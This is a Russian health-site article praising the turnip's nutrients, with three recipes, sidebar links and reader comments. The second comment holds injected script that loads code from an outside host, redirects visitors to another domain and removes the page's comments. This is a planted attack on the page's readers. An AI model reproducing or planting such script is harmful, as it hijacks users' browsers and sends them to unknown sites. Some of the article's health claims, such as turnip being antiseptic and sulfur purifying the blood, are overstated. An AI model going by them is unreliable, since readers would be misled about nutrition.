Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Проще пареной репы  >>  Проще пареной репы
 
Обратная связь
 

Проще пареной репы

Размер шрифта
31 мая 2011 00:01
  • google_analytics: false
  • Нравится

Сейчас репу упоминают лишь в сказках, поговорках и пословицах. А ведь до появления картофеля на Руси репа была завсегдатаем застолья наших предков. Почему? Все просто – в ней содержится масса полезных веществ. Да и готовить ее «проще пареной репы».

Проще пареной репы

Егор Кошелев / «Здоровье-инфо»

Репа получила признание еще в древности. Персы, греки и египтяне кормили репой рабов, считая ее хоть и грубой, но крайне питательной пищей. Римляне сеяли репу наравне с зерновыми культурами и виноградом. Во времена раннего Средневековья блюда из репы перешли в разряд настоящих деликатесов. На Руси без репы не обходилось ни одно застолье. Из нее готовили гарниры, супы, похлебки, пюре, соки, квас. Так могло бы продолжаться и до наших дней, но в XIX веке репа уступила картофелю. Только сейчас этот ценный продукт вновь приобретает популярность среди потребителей. Репу сравнительно легко выращивать и хранить. Главное достоинство репы по сравнению с картофелем – она содержит гораздо меньше крахмала и не так калорийна. В ней всего около 35 ккал на 100 г. Репа – настоящий кладезь полезных веществ.

1. Калий

Необходим для работы центральной нервной системы и поддержания водного баланса в тканях и клетках. Он способствует выделению натрия из организма и тем самым устраняет отеки. Калий применяется для профилактики нарушений сердечно-сосудистой системы.

2. Кальций

От содержания кальция напрямую зависит крепость наших зубов и костей: он предотвращает истощение костных тканей и развитие остеопороза. Кальций стабилизует работу мышц и нервной системы, нормализует обмен веществ, способствует свертыванию крови.

3. Фосфор

Как и кальций, фосфор крайне необходим для нормального развития костей, зубов и ногтей. Фосфор важен для усвоения глюкозы и превращения ее в энергию. Репа по содержанию фосфораопережает редьку и редис.

4. Магний

Этот элемент нужен для поддержания репродуктивной и иммунной систем, нормальной работы нервной системы и мышц, регулирования артериального давления и сердечного ритма, восстановления тканей организма и активности гормонов.

Чем полезна репа

5. Сера

Важное звено в процессе развития костных и кожных тканей, а также волос. Сера очищает и обеззараживает кровь, помогает справиться с инфекциями, применяется при лечении бронхита, ревматизма, мигрени, заболеваний кожи и печени.

6. Железо

Железо – основной микроэлемент. Он повышает содержание гемоглобина в крови, кроме того этот элемент крайне важен для переноса кислорода красными кровяными тельцами. Быстрее всего железо усваивается вместе с витамином C, которого в репе достаточно.

7. Марганец

Марганец укрепляет кости и нервную систему, поддерживает факторы свертывания крови, функционирования женских половых гормонов и гормонов щитовидной железы. К тому же марганец препятствует развитию атеросклероза, благотворно влияет на формирование эритроцитов, предотвращает ожирение печени и стимулирует накопление гликогена. Благодаря марганцу повышаются защитные силы организма.

8. Витамины

В репе содержится целый витаминный комплекс – A, B1, B2, B5, C, PP.

Помимо всего этого, репа обладает хорошими бактерицидными свойствами – чрезвычайно устойчива к воздействию атмосферы и гнилостных бактерий. Она также известна ранозаживляющим, обезболивающим, антисептическим и противовоспалительным действиями. При употреблении в пищу репа оздоровляет, очищает желудок и кишечник. Блюда на основе репы полезны для организма и приятны на вкус. Убедитесь сами, попробовав эти 3 несложных рецепта:


Пареная репа

Репа – 3 штуки
Горчичное масло – 1 столовая ложка
Мед – 1 чайная ложка
Смесь прованских трав
Соль – по вкусу

Репу промойте и поставьте в пароварку. На среднем пламени хватит и 20 минут. Из горчичного масла и меда сделайте соус. Затем аккуратно очистите репу от кожуры, нарежьте тонкими ломтиками, посолите по вкусу, полейте медом и посыпьте травами. Несколько минут – и блюдо готово.

Салат из репы с кольраби

Кольраби – 450 г
Репа – 240 г
Сок лимона – 3 столовых ложки
Мед – 2 чайных ложки
Кунжутное масло – 1 чайная ложка
Соль и молотый перец – по вкусу
Зеленый лук – 2 штуки

Очистите репу и разделите на 4 части. Измельчите зеленый лук. У кольраби удалите жесткие стебли, а листья нарежьте тонкими полосками. Затем в комбайне измельчите кольраби вместе с репой. Теперь заправка: в миске взбейте лимонный сок, кунжутное масло и мед, приправьте перцем и солью. Добавьте в миску лук, репу и кольраби, а затем перемешайте. Через 15 минут салат можно подавать на стол.

Репа, фаршированная яблоками и рисом

Репа – 150 г
Рис – 20 г
Яблоки – 60 г
Сахар – 10 г
1/2 яйца
Муки – 5 г
Молока – 60 г
Масло сливочное – 10 г

Репу тщательно очистите и отварите, затем выньте сердцевину, чтобы получилась «чашечка». Приготовьте фарш из вареного риса, смешанного с нарезанными яблоками, маслом, половинкой яйца и сахара. Запекайте в течение 40 минут.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

29 декабря 2012 в 16:35

Цитировать   |   Пожаловаться

Замечательная пареная репа. Я ее парю в скороварке. За 20 мин. готова. прямо коричневая. Только не поняла, смазать маслом или соусом? 

2 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сердечная диета   Здоровое питание при скромном бюджете   Скажите ребенку, что овощи – это вредно. Тогда он будет есть только их!   Пищевая пирамида  
08 августа 2011Чтобы дети ели больше овощей, их нужно прятать 27 июля 2011Как заставить детей есть овощи?
 
07 мая 2013Удобно готовить на антипригарных покрытиях? Наверное, но скоро вам придется менять сустав! 11 марта 2013Свекольный сок снижает давление
 

Слайдшоу

1
Лучшие перекусы
Лучшие и худшие блюда со всего мира. Часть 1
Продукты, сжигающие жир. Часть 2

Тесты

1
Что на вашем столе?
Есть ли у вас избыточный вес?
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.